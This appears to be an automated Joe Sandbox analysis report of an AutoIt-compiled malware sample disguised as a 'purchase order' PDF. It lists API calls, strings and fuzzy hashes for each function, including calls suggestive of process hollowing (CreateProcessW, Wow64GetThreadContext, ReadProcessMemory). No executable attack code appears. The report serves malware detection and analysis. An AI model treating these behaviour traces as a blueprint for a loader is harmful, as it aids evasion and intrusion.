
Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: de8801a3afa44c9d24b5153ddf35dd4a2b1fd424a537e250364c256b4c02c2c3
Instruction ID: f9f519a94955be911ad63bead406efdb40ad917a65faad9c04dcc919dbc64a84
Opcode Fuzzy Hash: de8801a3afa44c9d24b5153ddf35dd4a2b1fd424a537e250364c256b4c02c2c3
Instruction Fuzzy Hash: C1718BB141C3059EC724EFA9DC818ABBBE8FF85350B44482EF559C32A1DB30D948DB62

Function 00873A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00873A62
LoadCursorW.USER32(00000000,00007F00), ref: 00873A71
LoadIconW.USER32(00000063), ref: 00873A88
LoadIconW.USER32(000000A4), ref: 00873A9A
LoadIconW.USER32(000000A2), ref: 00873AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00873AD2
RegisterClassExW.USER32(?), ref: 00873B28

Part of subcall function 00873041: GetSysColorBrush.USER32(0000000F), ref: 00873074
Part of subcall function 00873041: RegisterClassExW.USER32(00000030), ref: 0087309E
Part of subcall function 00873041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008730AF
Part of subcall function 00873041: InitCommonControlsEx.COMCTL32(?), ref: 008730CC
Part of subcall function 00873041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008730DC
Part of subcall function 00873041: LoadIconW.USER32(000000A9), ref: 008730F2
Part of subcall function 00873041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00873101

Strings

#, xrefs: 00873B0D
AutoIt v3, xrefs: 00873B17
0, xrefs: 00873B06

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 8b49f685ebb8fd6ab42e6a11193145aad22c9af2abc18e0b941f1568bcad616e
Instruction ID: d7515901d76755e6f12e6fc06dc1b2691e837ecbc79aa3064750bbd6d1798586
Opcode Fuzzy Hash: 8b49f685ebb8fd6ab42e6a11193145aad22c9af2abc18e0b941f1568bcad616e
Instruction Fuzzy Hash: F8214D74924308BFEB109FA4EC49BAEBBB4FB08710F01812AE614E62A1D3B65554EF55

Function 00873633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 008736D2
KillTimer.USER32(?,00000001), ref: 008736FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0087371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0087372A
CreatePopupMenu.USER32 ref: 0087373E
PostQuitMessage.USER32(00000000), ref: 0087375F

Strings

TaskbarCreated, xrefs: 00873725

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 429127b3e00da625de9c76c0d499f64e550872ec88bef069b81ac611b47f405c
Instruction ID: 297316de217e2995a5fc90b1cad6aea354e0cef1634194b1b5c34e285d7576e1
Opcode Fuzzy Hash: 429127b3e00da625de9c76c0d499f64e550872ec88bef069b81ac611b47f405c
Instruction Fuzzy Hash: 7E410AB1114209BBDF246B78DC49B7A3795FB55340F148139F60AC62AADB60ED00FB63

Function 00873778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 008738B9
/AutoIt3ExecuteScript, xrefs: 008738CE
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 008737C0
CMDLINE, xrefs: 00873834
CMDLINERAW, xrefs: 0087380D
/AutoIt3OutputDebug, xrefs: 008738A4
/ErrorStdOut, xrefs: 0087388F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 43661f3338f4e341271e35bed2e6b4773b1117d59dc1aaa39f379ea67767d830
Instruction ID: 42c627ca46f243076cb5d975a70997e267cdfc6a77b634b1181c88d4aaa0dbac
Opcode Fuzzy Hash: 43661f3338f4e341271e35bed2e6b4773b1117d59dc1aaa39f379ea67767d830
Instruction Fuzzy Hash: D8A16F7291022DAADB04EBA8CC85EEEB778FF15300F048429F51AE7195DF74DA05DB62

Function 03642640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03642711
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03642937

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: d57e07192c8130c6d0b007a26ebc3bd5adb8993baec40c6292ce44261f43374c
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: 6FA10974E00209EFDB14CFA4C998BEEBBB5BF48304F248599E505BB280D7759A85CF54

Function 008739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00873A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00873A36
ShowWindow.USER32(00000000,?,?), ref: 00873A4A
ShowWindow.USER32(00000000,?,?), ref: 00873A53

Strings

edit, xrefs: 00873A30
AutoIt v3, xrefs: 00873A0D, 00873A12, 00873A13

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ec7decb94f9b28f02b065ad336697909f10d1a4c516e2be33d66063ffa2fdb08
Instruction ID: 0be92bf781bbf28fab7a4fdcc4e5c22f29d691650404b437b949b019eae5d0f8
Opcode Fuzzy Hash: ec7decb94f9b28f02b065ad336697909f10d1a4c516e2be33d66063ffa2fdb08
Instruction Fuzzy Hash: 48F03A706142947EEA301727AC08E373E7DEBC7F50F02802ABA10E2271C6A51810EEB1

Function 036423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 036422A0: Sleep.KERNELBASE(000001F4), ref: 036422B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0364252F

Strings

J99YDCHXIK6JWOMC1EOKGP3GJM, xrefs: 03642598, 0364259B

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: CreateFileSleep
String ID: J99YDCHXIK6JWOMC1EOKGP3GJM
API String ID: 2694422964-1741347400
Opcode ID: 99f12fbfcbb8669703632ac0ef86075f4e42b93baf0d04bb5416201c50e4fd37
Instruction ID: 5d608760ede539aa8b2305d7f2628e6c4f939946058a1fb7280cc5ca6a50844b
Opcode Fuzzy Hash: 99f12fbfcbb8669703632ac0ef86075f4e42b93baf0d04bb5416201c50e4fd37
Instruction Fuzzy Hash: 96718070D0428CDAEF15DBE4D8147EEBB75AF19304F144599E208BB2C0D7BA0B45CBAA

Function 0087410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008AD5EC

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

_memset.LIBCMT ref: 0087418D
_wcscpy.LIBCMT ref: 008741E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008741F1

Strings

Line: , xrefs: 008AD615

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 12ce75ec84eeec0b4d563b4caaa011302827d1443c58ff49531fa5279df84288
Instruction ID: b5a7ac4fe883d9884bf8f7e2234f29ab3529d67bbd2d18ecba4c6a816d35fbc3
Opcode Fuzzy Hash: 12ce75ec84eeec0b4d563b4caaa011302827d1443c58ff49531fa5279df84288
Instruction Fuzzy Hash: 8231C171408314AAE721EB68DC45FDB77E8FF44304F10C51AB1A9D20A6DB74E648CB93

Function 0089564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 008956AB
_memcpy_s.LIBCMT ref: 0089571D
__read_nolock.LIBCMT ref: 0089577B
__filbuf.LIBCMT ref: 0089579E
_memset.LIBCMT ref: 008957E2

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: b58a07d1b32cc3395e3af6dcfb29a29f1bb9c371537d233779f93a5ebff11b33
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: F5519230A00B09EBDF26AFA9C88466E77A1FF51324F6C8729F825D66D0D7709E518B41

Function 008769CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00874F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00874F6F

_free.LIBCMT ref: 008AE68C
_free.LIBCMT ref: 008AE6D3

Part of subcall function 00876BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00876D0D

Strings

Bad directive syntax error, xrefs: 008AE6BB
>>>AUTOIT SCRIPT<<<, xrefs: 008AE462

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 94480c53a2b091600af4fba93f2d887d4664c1ba04e6e46c858d72066ed5e1ba
Instruction ID: 0fe381a271af25b6853cd395889a1680b6aca6d6da7d4d648768f0b64ec04c20
Opcode Fuzzy Hash: 94480c53a2b091600af4fba93f2d887d4664c1ba04e6e46c858d72066ed5e1ba
Instruction Fuzzy Hash: 32917E71910619AFDF04EFA8C8919EDB7B4FF19314F14882AF815EB291EB70D904CB61

Function 008735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008735A1,SwapMouseButtons,00000004,?), ref: 008735D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008735A1,SwapMouseButtons,00000004,?,?,?,?,00872754), ref: 008735F5
RegCloseKey.KERNELBASE(00000000,?,?,008735A1,SwapMouseButtons,00000004,?,?,?,?,00872754), ref: 00873617

Strings

Control Panel\Mouse, xrefs: 008735D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 489f13e96405ec60f8fe12847ede08c567b1abf9bd7db73502afeba8ed3474a8
Instruction ID: c29b2f68c2230482f1976f3bc6dc0fe17881113fd46d6b3d92f712d24cfd978e
Opcode Fuzzy Hash: 489f13e96405ec60f8fe12847ede08c567b1abf9bd7db73502afeba8ed3474a8
Instruction Fuzzy Hash: 6C113671511218BADB218FA4D840DAAB7A8FF54740F108469B909E7214E6719E40A761

Function 036412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03641A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03641AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03641B13

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction ID: 90be33f1039a8cd09af688fb635da33c1e007d78ebb42e74f30aeab083b04079
Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction Fuzzy Hash: BC62F734E142589BEB24CFA4C950BDEB376EF59300F1091A9D10DEB390E77A9E81CB59

Function 008D97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00875045: _fseek.LIBCMT ref: 0087505D

Part of subcall function 008D99BE: _wcscmp.LIBCMT ref: 008D9AAE
Part of subcall function 008D99BE: _wcscmp.LIBCMT ref: 008D9AC1

_free.LIBCMT ref: 008D992C
_free.LIBCMT ref: 008D9933
_free.LIBCMT ref: 008D999E

Part of subcall function 00892F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00899C64), ref: 00892FA9
Part of subcall function 00892F95: GetLastError.KERNEL32(00000000,?,00899C64), ref: 00892FBB

_free.LIBCMT ref: 008D99A6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction ID: ed65f5c674a2df96599bd232d7c25c69617303a923eb696b03c46e023180b25d
Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction Fuzzy Hash: 165158B1904618AFDF249F68CC81A9EBBB9FF48310F0441AEF649E7241DB715A808F59

Function 0089493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008949D0
__flush.LIBCMT ref: 008949F0
__write.LIBCMT ref: 00894A23
__flsbuf.LIBCMT ref: 00894A51

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: cb7be7da9c9b3cceb5e769c67c328f5ae0a75a746bfa3168aba7382d86864aff
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 3341C570A0061A9FDF28AE69C880D6F7BE5FF84364B2C917DE855C7650E7709D428744

Function 008773E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008AEE62
GetOpenFileNameW.COMDLG32(?), ref: 008AEEAC

Part of subcall function 008748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008748A1,?,?,008737C0,?), ref: 008748CE

Part of subcall function 008909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008909F4

Strings

X, xrefs: 008AEE7A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: b6f40aad0641653951ca3c61602f05c5278ab0fee8435e8942a99fe123bc2dce
Instruction ID: ce9461e3f299f578b2ad9a83d43affaa2cdca7d29678b68a8c2a4e718819e85d
Opcode Fuzzy Hash: b6f40aad0641653951ca3c61602f05c5278ab0fee8435e8942a99fe123bc2dce
Instruction Fuzzy Hash: 7821C330A0025C9BDF51DF98C845BEE7BF8EF49314F04805AE508EB245DBB49989CFA2

Function 008D901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008D9036
__fread_nolock.LIBCMT ref: 008D904B

Strings

EA06, xrefs: 008D907D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: d353b2d1887f8315ab8c79e7dc1644b13615c9b44ac59ad57e91ec53865bfb48
Instruction ID: 4461ff089d385a349db87ccd2dbc187124d57567f0e0ce73cdecfe6f605cf592
Opcode Fuzzy Hash: d353b2d1887f8315ab8c79e7dc1644b13615c9b44ac59ad57e91ec53865bfb48
Instruction Fuzzy Hash: B601F9729046186EDF29D6A8DC16EEE7BFCDB01305F04419BF592D2181E575EA048760

Function 008D9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 008D9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008D9B99

Strings

aut, xrefs: 008D9B93

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 65275df62b2a9721bfff38e12698720a164462c9bca2fb6d083226129a944764
Instruction ID: fb5527eb9cebd8e7bcbaa21e278299e24ede314cd597390928c5ff732092d89f
Opcode Fuzzy Hash: 65275df62b2a9721bfff38e12698720a164462c9bca2fb6d083226129a944764
Instruction Fuzzy Hash: A9D05E7A54030DABDB10ABA4EC0EFAA772CFB04704F0042A1BF54D11A2DEB095A8CB91

Function 008ECDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
